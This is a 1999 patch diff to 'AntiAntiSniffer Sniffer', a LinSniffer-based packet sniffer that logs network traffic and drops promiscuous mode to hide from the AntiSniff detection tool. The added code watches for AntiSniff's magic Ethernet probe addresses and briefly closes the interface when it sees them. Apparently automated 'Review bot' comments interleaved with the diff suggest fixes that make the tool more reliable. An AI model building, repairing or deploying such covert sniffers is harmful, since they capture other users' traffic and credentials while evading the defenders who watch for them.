`--- aass-old.c Mon Jul 26 20:45:46 1999
+++ aass.c Mon Jul 26 21:54:47 1999
@@ -1,5 +1,5 @@
/*
- The AntiAntiSniffer Sniffer by Mike Perry
+ The AntiAntiSniffer Sniffer v0.2 by Mike Perry
To all my friends, coworkers, and associates who thought I knew better than
to do something like this, please understand that when I discovered I could
@@ -8,9 +8,15 @@
P.S. Legitimate tools such as icmplog will exhibit the same order of
magnitude latency increase on ping responses.
+ New to 0.2: I check eth frame's addresses for the magic value used by l0pht
+ antisniff, as well as your ethaddr if ULTRA_PARANOID is set.
+
Moral of the story: use ssh/lsh, and assume no host on your network is to
be trusted under any means.
-
+
+ P.S. Sorry to all my teachers. All the global varables must be killing you
+ guys right now :)
+
Based on:
LinSniffer 0.03 [BETA]
Mike Edulla
@@ -37,6 +43,10 @@
#define INTERFACE "eth0"
+#ifndef ETH_ALEN
+# define ETH_ALEN 6
+#endif
+
/* Really paranoid counts every packet in the load average. If the load
* average jumps, we drop the promisc bit, and sleep for a few seconds */
#define REALLY_PARANOID 3
@@ -61,8 +71,8 @@
* accumulate enough packets for accurate statistics! See the HIDEOUT &
* comments for more info..
*/
-#define NUM_PKTS_SHIFT 4
-#define NUM_PKTS 32
+#define NUM_PKTS_SHIFT 2
+#define NUM_PKTS 8
/*
* Secs to wait for the bad men to go away :)
@@ -83,19 +93,37 @@
/* This causes the algorithm to treat dead time as if a packet was coming
* every BASELINE usecs. Useful for intermittent traffic networks */
-#define BASELINE 5000 /* 5ms */
+#define BASELINE 4000 /* 4ms */
-/* As a last resort, don't track more than CMAX connections at once.
- */
+/* As a last resort, don't track more than CMAX connections at once. */
#define CMAX 10 /* -1 is Inf */
+/* This option controls if we watch for the AntiSniff magic packets, in
+ * addition to our own address (in case they are sending the ping before we
+ * detected a change in load)
+ * Note, this is a definable option because it is possible to use this against
+ * us, and send these packets all the time just to shut us down */
+#define ANTIMAGIC
+
+#ifdef ANTIMAGIC
+# define MAGIC1 "ff:00:00:00:00:00" /* Method #1 for Win* */
+# define MAGIC2 "66:66:66:66:66:66" /* AntiSniff user specified */
+# define MYADDR "fe:ed:de:ad:be:ef" /* Undefine and decrement NMAGIC, and
+ change the hex_addrlist to not watch
+ for your address */
+# define NMAGIC 3 /* Number of magic eth addrs to search */
+char *hex_addrlist[] = { MAGIC1, MAGIC2, MYADDR };
+char h_dest[NMAGIC][ETH_ALEN];
+#endif
+
+
#define CAPLEN 512
#define TIMEOUT 30
#define TCPLOG "test"
/* Actually, this debug option prints out some pretty useful stats you can use
* to set UMAX_LOAD */
-// #define DEBUG
+/*#define DEBUG */
#ifdef DEBUG
# define PRINTF(a...) printf(##a)
@@ -145,7 +173,57 @@
int s;
FILE *fp;
+#ifdef ANTIMAGIC
+
+# ifdef DEBUG
+# define PRINT_ETHER(a) print_ether(a)
+# else
+# define PRINT_ETHER(a)
+# endif
+void print_ether(char *addr)
+{
+ fprintf(fp,"Eth addr %2X:%2X:%2X:%2X:%2X:%2X\n",
+ addr[0] & 0xff, addr[1] & 0xff,
+ addr[2] & 0xff, addr[3] & 0xff,
+ addr[4] & 0xff, addr[5] & 0xff);
+ fflush(fp);
+}
+
+void init_magic()
+{
+ char *p;
+ int j = 0, i;
+
+ for(j = 0; j < NMAGIC; j++)
+ {
+ p = hex_addrlist[j];
+ PRINTF("Blocking addr %s\n", p);
+ for(i=0; i < ETH_ALEN && p && *p != 0; i++, p++)
+ {
+ h_dest[j][i] = strtol(p, NULL, 16) & 0xff;
+ p = strchr(p, ':');
+ }
+ PRINT_ETHER(h_dest[j]);
+ }
+}
+
+int ismagic()
+{
+ register int i;
+
+ PRINT_ETHER(ep.eth.h_dest);
+
+ for(i = 0; i < NMAGIC; i++)
+ {
+ if(!memcmp(ep.eth.h_dest, h_dest[i], ETH_ALEN))
+ {
+ return 1;
+ }
+ }
+ return 0;
+}
+#endif
void set_promisc(char *dev, int s)
{
struct ifreq ifr;
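Review bot: In init_magic, the for-header increment `p++` runs after `p = strchr(p, ':')` may have returned NULL, so any table entry with fewer than six colon-separated octets advances a null pointer and dereferences it on the next iteration; the three current entries have exactly six octets, which is why this does not fire today. Move the advance into the body: `p = strchr(p, ':');` then `if (p) p++;`, and drop `p++` from the for header so the `p &&` guard is reached first. In print_ether, `%2X` pads with spaces rather than zeros, so a byte like 0x0a prints as ` A`; `%02X` gives the intended two-digit form. set_promisc at the end of the hunk continues outside it.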
@@ -315,6 +393,14 @@
{
if(read(s, (struct etherpacket *) &ep, sizeof(ep)) > 1)
{
+#ifdef ANTIMAGIC
+ if(ismagic())
+ {
+ closeintf(INTERFACE,s);
+ usleep(randhide());
+ openintf(INTERFACE);
+ }
+#endif
#if AASS == REALLY_PARANOID
if(account_load(&rawload))
{
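Review bot: The reopen after a magic frame discards openintf's return value (`openintf(INTERFACE);`), whereas main stores it with `s = openintf(INTERFACE);` in the last hunk; if closeintf closes the raw socket, the next `read(s, ...)` in this loop uses a dead descriptor and the freshly opened one leaks. Assign the result the way main does, bearing in mind that `s` here may be the function's parameter rather than the global of the same name, in which case the caller's copy also needs updating. ismagic() additionally runs on any read longer than one byte, so a truncated frame is compared against six bytes of whatever the previous read left in ep.eth.h_dest; checking the read length against `sizeof(ep.eth)` before the call would avoid acting on stale data. The enclosing function starts and ends outside this hunk.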
@@ -500,7 +586,6 @@
signal(SIGKILL, cleanup);
signal(SIGQUIT, cleanup);
fp = fopen(TCPLOG, "at");
- s = openintf(INTERFACE);
gettimeofday(&tv, NULL);
srand(tv.tv_usec ^ getpid() ^ (getppid() << 16));
@@ -516,8 +601,12 @@
}
vlist_head.next = NULL;
+#ifdef ANTIMAGIC
+ init_magic();
+#endif
init_load(&tcpload);
init_load(&rawload);
+ s = openintf(INTERFACE);
for (;;)
{
read_tcp(s);